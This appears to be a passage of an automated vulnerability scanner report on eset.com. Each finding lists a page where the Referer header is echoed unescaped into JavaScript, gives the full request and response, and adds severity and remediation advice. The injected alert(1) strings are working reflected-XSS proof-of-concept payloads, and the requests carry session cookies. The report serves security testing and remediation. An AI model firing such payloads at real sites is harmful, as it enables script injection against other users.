Date: Sun, 17 Apr 2011 14:15:41 GMT
X-Varnish: 1858168676
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
the next lines. */
s.pageName="";
s.server="";
s.channel="Business";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=171a7"-alert(1)-"728ddbe3c42";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...

1.9. http://www.eset.com/us/company [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/company

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a378a"-alert(1)-"cc718e60cd8 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /us/company HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.1.10.1303044897; s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B
Referer: http://www.google.com/search?hl=en&q=a378a"-alert(1)-"cc718e60cd8

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 15330
Date: Sun, 17 Apr 2011 12:59:39 GMT
X-Varnish: 1857996636
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>A
...[SNIP]...

the next lines. */
s.pageName="";
s.server="";
s.channel="Company";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=a378a"-alert(1)-"cc718e60cd8";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...

1.10. http://www.eset.com/us/company/contact [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/company/contact

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 183b2"-alert(1)-"80f4e4b2bd was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /us/company/contact HTTP/1.1
Host: www.eset.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.2.10.1303044897; mbox=check#true#1303045213|session#1303045152447-372951#1303047013|PC#1303045152447-372951.17#1304254757;
Referer: http://www.google.com/search?hl=en&q=183b2"-alert(1)-"80f4e4b2bd

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 19318
Date: Sun, 17 Apr 2011 14:15:41 GMT
X-Varnish: 1858168711
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>C
...[SNIP]...

the next lines. */
s.pageName="";
s.server="";
s.channel="Company";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=183b2"-alert(1)-"80f4e4b2bd";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...

1.11. http://www.eset.com/us/company/fun-stuff [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/company/fun-stuff

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b04f0"-alert(1)-"e90e470ffad was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /us/company/fun-stuff HTTP/1.1
Host: www.eset.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.2.10.1303044897; mbox=check#true#1303045213|session#1303045152447-372951#1303047013|PC#1303045152447-372951.17#1304254757;
Referer: http://www.google.com/search?hl=en&q=b04f0"-alert(1)-"e90e470ffad

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 13633
Date: Sun, 17 Apr 2011 14:15:41 GMT
X-Varnish: 1858168724
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>F
...[SNIP]...

the next lines. */
s.pageName="";
s.server="";
s.channel="Company";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=b04f0"-alert(1)-"e90e470ffad";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...

1.12. http://www.eset.com/us/company/legal-notices [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/company/legal-notices

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 180f9"-alert(1)-"a6eaf5719f2 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /us/company/legal-notices HTTP/1.1
Host: www.eset.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.2.10.1303044897; mbox=check#true#1303045213|session#1303045152447-372951#1303047013|PC#1303045152447-372951.17#1304254757;
Referer: http://www.google.com/search?hl=en&q=180f9"-alert(1)-"a6eaf5719f2

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 19098
Date: Sun, 17 Apr 2011 14:15:42 GMT
X-Varnish: 1858168772
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...

the next lines. */
s.pageName="";
s.server="";
s.channel="Company";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=180f9"-alert(1)-"a6eaf5719f2";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...

1.13. http://www.eset.com/us/company/privacy-policy [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/company/privacy-policy

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e97d8"-alert(1)-"fbe9f8cd23c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /us/company/privacy-policy HTTP/1.1
Host: www.eset.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.2.10.1303044897; mbox=check#true#1303045213|session#1303045152447-372951#1303047013|PC#1303045152447-372951.17#1304254757;
Referer: http://www.google.com/search?hl=en&q=e97d8"-alert(1)-"fbe9f8cd23c

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 25660
Date: Sun, 17 Apr 2011 14:15:42 GMT
X-Varnish: 1858168788
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...

the next lines. */
s.pageName="";
s.server="";
s.channel="Company";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=e97d8"-alert(1)-"fbe9f8cd23c";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...

1.14. http://www.eset.com/us/download [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/download

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4d532"-alert(1)-"511703cb891 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /us/download HTTP/1.1
Host: www.eset.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.2.10.1303044897; mbox=check#true#1303045213|session#1303045152447-372951#1303047013|PC#1303045152447-372951.17#1304254757;
Referer: http://www.google.com/search?hl=en&q=4d532"-alert(1)-"511703cb891

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 121242
Date: Sun, 17 Apr 2011 14:15:53 GMT
X-Varnish: 1858169596
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>B
...[SNIP]...
the next lines. */
s.pageName="";
s.server="";
s.channel="Download";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=4d532"-alert(1)-"511703cb891";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...

1.15. http://www.eset.com/us/download/free-trial [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/download/free-trial

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f8efc"-alert(1)-"85ec92afe8 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /us/download/free-trial HTTP/1.1
Host: www.eset.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.2.10.1303044897; mbox=check#true#1303045213|session#1303045152447-372951#1303047013|PC#1303045152447-372951.17#1304254757;
Referer: http://www.google.com/search?hl=en&q=f8efc"-alert(1)-"85ec92afe8

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 16364
Date: Sun, 17 Apr 2011 14:15:44 GMT
X-Varnish: 1858168989
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>B
...[SNIP]...
the next lines. */
s.pageName="";
s.server="";
s.channel="Download";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=f8efc"-alert(1)-"85ec92afe8";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...

1.16. http://www.eset.com/us/download/free-trial/nod32-antivirus [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/download/free-trial/nod32-antivirus

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4915b"-alert(1)-"48ff9162e36 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /us/download/free-trial/nod32-antivirus HTTP/1.1
Host: www.eset.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.2.10.1303044897; mbox=check#true#1303045213|session#1303045152447-372951#1303047013|PC#1303045152447-372951.17#1304254757;
Referer: http://www.google.com/search?hl=en&q=4915b"-alert(1)-"48ff9162e36

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 21464
Date: Sun, 17 Apr 2011 14:15:45 GMT
X-Varnish: 1858169070
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>F
...[SNIP]...
the next lines. */
s.pageName="";
s.server="";
s.channel="Download";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=4915b"-alert(1)-"48ff9162e36";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...

1.17. http://www.eset.com/us/download/free-trial/smart-security [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/download/free-trial/smart-security

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 99a9d"-alert(1)-"f4bb3c9f35 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /us/download/free-trial/smart-security HTTP/1.1
Host: www.eset.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.2.10.1303044897; mbox=check#true#1303045213|session#1303045152447-372951#1303047013|PC#1303045152447-372951.17#1304254757;
Referer: http://www.google.com/search?hl=en&q=99a9d"-alert(1)-"f4bb3c9f35

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 21574
Date: Sun, 17 Apr 2011 14:15:47 GMT
X-Varnish: 1858169255
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>F
...[SNIP]...
the next lines. */
s.pageName="";
s.server="";
s.channel="Download";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=99a9d"-alert(1)-"f4bb3c9f35";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...

1.18. http://www.eset.com/us/home [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/home

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3de70"-alert(1)-"aff7b074c41 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /us/home HTTP/1.1
Host: www.eset.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
